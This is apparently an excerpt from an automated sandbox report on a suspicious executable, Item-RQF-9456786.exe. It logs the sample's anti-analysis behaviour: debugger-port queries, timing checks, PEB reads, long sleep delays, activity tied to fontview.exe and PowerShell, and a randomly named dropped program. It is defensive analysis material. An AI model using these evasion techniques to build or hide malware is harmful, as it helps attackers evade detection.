    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\fontview.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: Yara match File source: Process Memory Space: Item-RQF-9456786.exe PID: 1628, type: MEMORYSTR
    Source: C:\Windows\SysWOW64\fontview.exe API/Special instruction interceptor: Address: 7FF8C88ED324
    Source: C:\Windows\SysWOW64\fontview.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
    Source: C:\Windows\SysWOW64\fontview.exe API/Special instruction interceptor: Address: 7FF8C88ED944
    Source: C:\Windows\SysWOW64\fontview.exe API/Special instruction interceptor: Address: 7FF8C88ED504
    Source: C:\Windows\SysWOW64\fontview.exe API/Special instruction interceptor: Address: 7FF8C88ED544
    Source: C:\Windows\SysWOW64\fontview.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
    Source: C:\Windows\SysWOW64\fontview.exe API/Special instruction interceptor: Address: 7FF8C88F0154
    Source: C:\Windows\SysWOW64\fontview.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Memory allocated: B00000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Memory allocated: 29A0000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Memory allocated: E60000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Memory allocated: 89F0000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Memory allocated: 99F0000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Memory allocated: 9BF0000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Memory allocated: ABF0000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_017E096E rdtsc 5_2_017E096E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5369
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1932
    Source: C:\Windows\SysWOW64\fontview.exe Window / User API: threadDelayed 3672
    Source: C:\Windows\SysWOW64\fontview.exe Window / User API: threadDelayed 6300
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe API coverage: 0.7 %
    Source: C:\Windows\SysWOW64\fontview.exe API coverage: 3.1 %
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe TID: 1576 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5824 Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4208 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6176 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\fontview.exe TID: 6112 Thread sleep count: 3672 > 30
    Source: C:\Windows\SysWOW64\fontview.exe TID: 6112 Thread sleep time: -7344000s >= -30000s
    Source: C:\Windows\SysWOW64\fontview.exe TID: 6112 Thread sleep count: 6300 > 30
    Source: C:\Windows\SysWOW64\fontview.exe TID: 6112 Thread sleep time: -12600000s >= -30000s
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe TID: 4024 Thread sleep time: -75000s >= -30000s
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe TID: 4024 Thread sleep count: 39 > 30
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe TID: 4024 Thread sleep time: -58500s >= -30000s
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe TID: 4024 Thread sleep count: 40 > 30
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe TID: 4024 Thread sleep time: -40000s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
    Source: C:\Windows\SysWOW64\fontview.exe Last function: Thread delayed
    Source: C:\Windows\SysWOW64\fontview.exe Code function: 10_2_0301C700 FindFirstFileW,FindNextFileW,FindClose,10_2_0301C700
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Process queried: DebugPort
    Source: C:\Windows\SysWOW64\fontview.exe Process queried: DebugPort
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_017E096E rdtsc 5_2_017E096E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_00417C23 LdrLoadDll,5_2_00417C23
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_01844180 mov eax, dword ptr fs:[00000030h] 5_2_01844180
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179823B mov eax, dword ptr fs:[00000030h]5_2_0179823B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B02E1 mov eax, dword ptr fs:[00000030h]5_2_017B02E1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B02E1 mov eax, dword ptr fs:[00000030h]5_2_017B02E1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B02E1 mov eax, dword ptr fs:[00000030h]5_2_017B02E1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA2C3 mov eax, dword ptr fs:[00000030h]5_2_017AA2C3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA2C3 mov eax, dword ptr fs:[00000030h]5_2_017AA2C3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA2C3 mov eax, dword ptr fs:[00000030h]5_2_017AA2C3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA2C3 mov eax, dword ptr fs:[00000030h]5_2_017AA2C3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AA2C3 mov eax, dword ptr fs:[00000030h]5_2_017AA2C3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01828243 mov eax, dword ptr fs:[00000030h]5_2_01828243
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01828243 mov ecx, dword ptr fs:[00000030h]5_2_01828243
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B02A0 mov eax, dword ptr fs:[00000030h]5_2_017B02A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B02A0 mov eax, dword ptr fs:[00000030h]5_2_017B02A0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01850274 mov eax, dword ptr fs:[00000030h]5_2_01850274
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE284 mov eax, dword ptr fs:[00000030h]5_2_017DE284
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE284 mov eax, dword ptr fs:[00000030h]5_2_017DE284
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D656A mov eax, dword ptr fs:[00000030h]5_2_017D656A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D656A mov eax, dword ptr fs:[00000030h]5_2_017D656A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D656A mov eax, dword ptr fs:[00000030h]5_2_017D656A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018205A7 mov eax, dword ptr fs:[00000030h]5_2_018205A7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018205A7 mov eax, dword ptr fs:[00000030h]5_2_018205A7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018205A7 mov eax, dword ptr fs:[00000030h]5_2_018205A7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A8550 mov eax, dword ptr fs:[00000030h]5_2_017A8550
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A8550 mov eax, dword ptr fs:[00000030h]5_2_017A8550
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE53E mov eax, dword ptr fs:[00000030h]5_2_017CE53E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0535 mov eax, dword ptr fs:[00000030h]5_2_017B0535
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01836500 mov eax, dword ptr fs:[00000030h]5_2_01836500
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DC5ED mov eax, dword ptr fs:[00000030h]5_2_017DC5ED
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DC5ED mov eax, dword ptr fs:[00000030h]5_2_017DC5ED
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A25E0 mov eax, dword ptr fs:[00000030h]5_2_017A25E0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A65D0 mov eax, dword ptr fs:[00000030h]5_2_017A65D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA5D0 mov eax, dword ptr fs:[00000030h]5_2_017DA5D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA5D0 mov eax, dword ptr fs:[00000030h]5_2_017DA5D0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE5CF mov eax, dword ptr fs:[00000030h]5_2_017DE5CF
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE5CF mov eax, dword ptr fs:[00000030h]5_2_017DE5CF
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C45B1 mov eax, dword ptr fs:[00000030h]5_2_017C45B1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C45B1 mov eax, dword ptr fs:[00000030h]5_2_017C45B1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE59C mov eax, dword ptr fs:[00000030h]5_2_017DE59C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D4588 mov eax, dword ptr fs:[00000030h]5_2_017D4588
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A2582 mov eax, dword ptr fs:[00000030h]5_2_017A2582
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A2582 mov ecx, dword ptr fs:[00000030h]5_2_017A2582
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CA470 mov eax, dword ptr fs:[00000030h]5_2_017CA470
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CA470 mov eax, dword ptr fs:[00000030h]5_2_017CA470
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017CA470 mov eax, dword ptr fs:[00000030h]5_2_017CA470
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179645D mov eax, dword ptr fs:[00000030h]5_2_0179645D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C245A mov eax, dword ptr fs:[00000030h]5_2_017C245A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182A4B0 mov eax, dword ptr fs:[00000030h]5_2_0182A4B0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DA430 mov eax, dword ptr fs:[00000030h]5_2_017DA430
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179E420 mov eax, dword ptr fs:[00000030h]5_2_0179E420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179E420 mov eax, dword ptr fs:[00000030h]5_2_0179E420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179E420 mov eax, dword ptr fs:[00000030h]5_2_0179E420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0179C427 mov eax, dword ptr fs:[00000030h]5_2_0179C427
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D8402 mov eax, dword ptr fs:[00000030h]5_2_017D8402
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D8402 mov eax, dword ptr fs:[00000030h]5_2_017D8402
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D8402 mov eax, dword ptr fs:[00000030h]5_2_017D8402
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A04E5 mov ecx, dword ptr fs:[00000030h]5_2_017A04E5
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D44B0 mov ecx, dword ptr fs:[00000030h]5_2_017D44B0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A64AB mov eax, dword ptr fs:[00000030h]5_2_017A64AB
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182C460 mov ecx, dword ptr fs:[00000030h]5_2_0182C460
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A8770 mov eax, dword ptr fs:[00000030h]5_2_017A8770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0184678E mov eax, dword ptr fs:[00000030h]5_2_0184678E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A0750 mov eax, dword ptr fs:[00000030h]5_2_017A0750
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2750 mov eax, dword ptr fs:[00000030h]5_2_017E2750
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2750 mov eax, dword ptr fs:[00000030h]5_2_017E2750
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D674D mov esi, dword ptr fs:[00000030h]5_2_017D674D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D674D mov eax, dword ptr fs:[00000030h]5_2_017D674D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D674D mov eax, dword ptr fs:[00000030h]5_2_017D674D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D273C mov eax, dword ptr fs:[00000030h]5_2_017D273C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D273C mov ecx, dword ptr fs:[00000030h]5_2_017D273C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D273C mov eax, dword ptr fs:[00000030h]5_2_017D273C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_018207C3 mov eax, dword ptr fs:[00000030h]5_2_018207C3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DC720 mov eax, dword ptr fs:[00000030h]5_2_017DC720
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DC720 mov eax, dword ptr fs:[00000030h]5_2_017DC720
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182E7E1 mov eax, dword ptr fs:[00000030h]5_2_0182E7E1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A0710 mov eax, dword ptr fs:[00000030h]5_2_017A0710
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D0710 mov eax, dword ptr fs:[00000030h]5_2_017D0710
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017DC700 mov eax, dword ptr fs:[00000030h]5_2_017DC700
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A47FB mov eax, dword ptr fs:[00000030h]5_2_017A47FB
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A47FB mov eax, dword ptr fs:[00000030h]5_2_017A47FB
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C27ED mov eax, dword ptr fs:[00000030h]5_2_017C27ED
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C27ED mov eax, dword ptr fs:[00000030h]5_2_017C27ED
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017C27ED mov eax, dword ptr fs:[00000030h]5_2_017C27ED
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0181C730 mov eax, dword ptr fs:[00000030h]5_2_0181C730
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017AC7C0 mov eax, dword ptr fs:[00000030h]5_2_017AC7C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017A07AF mov eax, dword ptr fs:[00000030h]5_2_017A07AF
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_01824755 mov eax, dword ptr fs:[00000030h]5_2_01824755
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0182E75D mov eax, dword ptr fs:[00000030h]5_2_0182E75D
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017D2674 mov eax, dword ptr fs:[00000030h]5_2_017D2674
